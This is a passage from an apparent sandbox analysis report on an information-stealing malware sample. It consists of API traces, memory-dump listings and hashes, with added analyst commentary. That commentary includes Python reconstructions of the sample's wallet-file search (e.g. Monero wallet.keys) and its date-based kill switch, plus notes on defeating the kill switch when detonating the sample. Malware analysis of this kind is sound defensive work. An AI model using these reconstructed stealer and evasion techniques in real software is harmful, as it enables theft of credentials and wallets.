                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: C7o$!%x7$+ tK$,%^~$?i$C.kw$]{_U
                        • API String ID: 0-2684099373
                        • Opcode ID: 83cec2cf1b0ad8538f8f38fd5b3a5d610bd2961765548482be28186ed2f8fd52
                        • Instruction ID: d85d570fc3896478ad8f1aaef4f93ad57c4a2e2402120d6fdc826d6f6888baaf
                        • Opcode Fuzzy Hash: 83cec2cf1b0ad8538f8f38fd5b3a5d610bd2961765548482be28186ed2f8fd52
                        • Instruction Fuzzy Hash: 37B206F390C6009FE704AE29EC8567AFBE5EF94720F1A893DEAC487344E63558418797
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006B0D73), ref: 0069E4A2
                        • StrCmpCA.SHLWAPI(?,006B14F8), ref: 0069E4F2
                        • StrCmpCA.SHLWAPI(?,006B14FC), ref: 0069E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: bd2b5ef18676113301338535fa1dbc55bccb37b262509f4f0ffca011adccbafa
                        • Instruction ID: 38c0b8f63df206bb7b8ff050dd7aabd0d5b3e96f3f6650938df74a4af5fc57a0
                        • Opcode Fuzzy Hash: bd2b5ef18676113301338535fa1dbc55bccb37b262509f4f0ffca011adccbafa
                        • Instruction Fuzzy Hash: 651283719101149BDB94FBA0DC96EEE733AAF55300F4041AEB50B96091EF34AF49CF96
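The record above is the stealer's file-system walk: FindFirstFileA on `<dir>\*.*`, two StrCmpCA calls per entry, FindNextFileA, and string-building subcalls (lstrlen/lstrcpy/lstrcat) that carry the literal `\Monero\wallet.keys`. The Python below is an added reconstruction of that loop, not code recovered from the sample: it assumes the two StrCmpCA calls compare each entry against `.` and `..`, runs over a constructed in-memory directory tree, and uses a target list in which only the Monero wallet path comes from the report (the Mozilla entry is a made-up stand-in).

```python
"""Reconstruction of the FindFirstFileA / StrCmpCA / FindNextFileA walk seen in
the trace above.  Added illustration; the "." / ".." comparison and the target
list are assumptions, only "\Monero\wallet.keys" appears in the report."""
from typing import Dict, Iterator, List, Tuple

# Constructed in-memory tree standing in for a user profile.
# None marks a file, a dict marks a sub-directory.
SAMPLE_TREE: Dict[str, object] = {
    "AppData": {
        "Roaming": {
            "Monero": {"wallet.keys": None, "wallet.address.txt": None},
            "Mozilla": {"profiles.ini": None},
        }
    },
    "Desktop": {"notes.txt": None},
}

# Only the Monero path is literally present in the trace; the second entry is a
# constructed stand-in for the kind of path list a stealer carries.
TARGET_SUFFIXES = ["\\Monero\\wallet.keys", "\\Mozilla\\profiles.ini"]


def lookup(tree, path: str):
    """Resolve a backslash-separated path (relative to the tree root)."""
    node = tree
    for part in [p for p in path.split("\\") if p]:
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node


def find_files(tree, path: str) -> Iterator[Tuple[str, bool]]:
    """Emulate FindFirstFileA(path + "\\*.*") / FindNextFileA: yield
    (name, is_directory) for every entry, including the "." and ".."
    pseudo-entries the real API returns inside a sub-directory."""
    node = lookup(tree, path)
    if not isinstance(node, dict):
        return
    if path:  # a drive root has no "." / ".."
        yield ".", True
        yield "..", True
    for name, child in node.items():
        yield name, isinstance(child, dict)


def walk_for_targets(tree, start: str, targets) -> List[str]:
    """Same shape as the traced loop: FindFirstFile -> skip "." and ".."
    (the two StrCmpCA calls) -> recurse into directories, test file names
    against the target list -> FindNextFile."""
    found: List[str] = []
    for name, is_dir in find_files(tree, start):
        if name == "." or name == "..":  # StrCmpCA(name, "."), StrCmpCA(name, "..")
            continue
        full = f"{start}\\{name}" if start else name  # lstrcpy/lstrcat subcalls
        if is_dir:
            found.extend(walk_for_targets(tree, full, targets))
        else:
            for target in targets:
                if full.lower().endswith(target.lower()):
                    found.append(full)
    return found


if __name__ == "__main__":
    for hit in walk_for_targets(SAMPLE_TREE, "", TARGET_SUFFIXES):
        print("would collect:", hit)
```

The two StrCmpCA calls against fixed addresses (006B14F8, 006B14FC) sit four bytes apart, which is exactly the room needed for `".\0"` and `"..\0"` in a string table; that is what makes the `.`/`..` reading above a reasonable assumption rather than a certainty, and it is the first thing to confirm when the snapshot is opened in IDA.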
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6twY$71no$B}$^bVC$iH9?$lt[?
                        • API String ID: 0-2218641548
                        • Opcode ID: 9f1b958df484b7e4d6beadf4e2e44357338513be9e1d13cb86a35f1f572aa15c
                        • Instruction ID: d033f89aa3de6250cb69c686df94204e7b74490d4b88ef3787ba6845bdf917d7
                        • Opcode Fuzzy Hash: 9f1b958df484b7e4d6beadf4e2e44357338513be9e1d13cb86a35f1f572aa15c
                        • Instruction Fuzzy Hash: 16A205F390C204AFE308AF2DEC4567AB7E5EF94720F1A493DEAC583744EA3559108697
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                        • LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: Ni
                        • API String ID: 4291131564-3198496747
                        • Opcode ID: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
                        • Instruction ID: f4e1168f5bc9028f53c60cdab7221c0d7ce12a954d783a6161080f66165f89bd
                        • Opcode Fuzzy Hash: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
                        • Instruction Fuzzy Hash: BF11A2B4241208AFEB14CF64DC95FAA77B9FB89700F208159FD159B394C7B6A901DBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3{m$%#}$/fo$^m $p&6^
                        • API String ID: 0-3614866622
                        • Opcode ID: 1fca989013caa10908abde9b6144a294baee3c4bbea00d3e67449c23ab5decae
                        • Instruction ID: a539d833279f001be8f556a8cc3624d22db3ed4c582149d2fff0599d0f02dcc2
                        • Opcode Fuzzy Hash: 1fca989013caa10908abde9b6144a294baee3c4bbea00d3e67449c23ab5decae
                        • Instruction Fuzzy Hash: 92B229F3A0C2049FE304AE2DEC8567AF7E5EF94720F1A893DEAC4D3744E63558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4Zov$P[Mo$_-K\$cq_o$j!k{
                        • API String ID: 0-3130016585
                        • Opcode ID: 62f1905a5ec7ad5c46c77d2b300784e888646f11927c25ef5bec299d9d7a00e5
                        • Instruction ID: d1161a9c2a922e1bde799cc1d46623a035b9b8fce8b3753e531750cbf8af772f
                        • Opcode Fuzzy Hash: 62f1905a5ec7ad5c46c77d2b300784e888646f11927c25ef5bec299d9d7a00e5
                        • Instruction Fuzzy Hash: 68A209F360C2049FE304AE2DEC8577AFBE9EB94720F16463DEAC4C3744E63598158696
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
                        • lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
                        • lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
                        • lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: b8b5831338f7c6c668dd8b9beab452384c984cde623aee5ed88f1270ceabb08c
                        • Instruction ID: cae9bfd4557a0a9be6fe2762204bc3899151e53975ef1c497ca8a5524e406097
                        • Opcode Fuzzy Hash: b8b5831338f7c6c668dd8b9beab452384c984cde623aee5ed88f1270ceabb08c
                        • Instruction Fuzzy Hash: 324192B5D0421ADFDB10DFA0DD89BFEB7B9BB48304F1042A9E509A7280D7709A84CF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 006A696C
                        • sscanf.NTDLL ref: 006A6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69C0
                        • ExitProcess.KERNEL32 ref: 006A69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
                        • Instruction ID: cf5eabca63612cf05bbabdfc4d92d67be60dbca19001e8de0b4efa4cfbceae10
                        • Opcode Fuzzy Hash: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
                        • Instruction Fuzzy Hash: 9021EB75D10209ABCF48EFE4D945AEEB7BABF48300F14852EE416E3250EB345604CB69
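The function above (GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess) is the shape of a date-based kill switch: the current time and a date string embedded in the binary are both converted to FILETIME and compared, and the process exits if the cut-off has passed. This matters for analysts because a run on a sandbox whose clock is past that date ends before any stealing happens, which is the "evasive API chain" class of finding listed in the overview. The Python below is an added reconstruction of that logic, not code from the sample; the sscanf format (`%d-%d-%d`), the comparison direction and the sample cut-off date are assumptions.

```python
"""Reconstruction of the GetSystemTime / sscanf / SystemTimeToFileTime /
ExitProcess gate seen in the trace above.  Added illustration; the date
format, comparison direction and the cut-off value are assumptions."""
import re
from datetime import datetime, timezone
from typing import Tuple

# FILETIME counts 100-ns ticks since 1601-01-01 UTC.  This is the documented
# distance from that epoch to the Unix epoch (0x019DB1DED53E8000 ticks).
EPOCH_DIFF_100NS = 116444736000000000


def system_time_to_file_time(year: int, month: int, day: int,
                             hour: int = 0, minute: int = 0, second: int = 0) -> int:
    """Same conversion SystemTimeToFileTime performs (whole seconds)."""
    dt = datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)
    return int(dt.timestamp()) * 10_000_000 + EPOCH_DIFF_100NS


def parse_expiry(date_str: str) -> Tuple[int, int, int]:
    """Stand-in for sscanf(date_str, "%d-%d-%d", &y, &m, &d); format assumed.
    Like sscanf returning fewer than 3 fields, an unparseable string is an error."""
    m = re.fullmatch(r"\s*(\d+)-(\d+)-(\d+)", date_str)
    if not m:
        raise ValueError("expiry string did not match %d-%d-%d")
    y, mo, d = (int(x) for x in m.groups())
    return y, mo, d


def should_exit(now_ymd: Tuple[int, int, int], expiry_str: str) -> bool:
    """True when the reconstructed gate would call ExitProcess: the current
    FILETIME is later than the embedded cut-off FILETIME."""
    y, mo, d = parse_expiry(expiry_str)
    now_ft = system_time_to_file_time(*now_ymd)
    return now_ft > system_time_to_file_time(y, mo, d)


if __name__ == "__main__":
    # Assumed cut-off; a real sample carries its own string in the data section.
    today = datetime.now(timezone.utc)
    print("would exit:", should_exit((today.year, today.month, today.day), "2024-10-15"))
```

When detonating a sample with this gate, either set the guest clock before the embedded date or patch the conditional jump after the second SystemTimeToFileTime; the address 006A69DA of the ExitProcess call in the trace is where to set the breakpoint to find it.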
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0069724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00697254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00697281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006972A4
                        • LocalFree.KERNEL32(?), ref: 006972AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
                        • Instruction ID: ee03cf993f0893fe12efa29fa47c252e88b2cd44775738241044dc41d2fcbe9b
                        • Opcode Fuzzy Hash: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
                        • Instruction Fuzzy Hash: 1A014CB1A41208BBEB14DFD4CD4AF9E7BB8BB44B00F204155FB05AA2C0D6B0AA008B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006A961E
                        • Process32First.KERNEL32(006B0ACA,00000128), ref: 006A9632
                        • Process32Next.KERNEL32(006B0ACA,00000128), ref: 006A9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 006A965C
                        • CloseHandle.KERNEL32(006B0ACA), ref: 006A967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
                        • Instruction ID: cba2f04aa5a7267499c93763c473aff84a4c29dc20b44cc1cfa9abbc0be0f0c7
                        • Opcode Fuzzy Hash: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
                        • Instruction Fuzzy Hash: A0010C75A01208ABDB14DFA5CD48BEDB7F9FF49700F204299A905A6240DB749F40DF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !~}$CP~$CP~$[5}[$~w
                        • API String ID: 0-1243999158
                        • Opcode ID: 48cd9e7058a1a3b5e3264fae031b423d05b3e486476fde51c1403d9ce19b2bad
                        • Instruction ID: c0d330ee74f0bd2960ff44dd0e09a559d1b18406282e7bd254986b41d869c3a3
                        • Opcode Fuzzy Hash: 48cd9e7058a1a3b5e3264fae031b423d05b3e486476fde51c1403d9ce19b2bad
                        • Instruction Fuzzy Hash: 2282E6F3A082109FE304AE2DEC8567ABBE5EB94720F16853DEAC4D3744E63598058797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *W$5m$kGO^$tK,~$\o
                        • API String ID: 0-2829524358
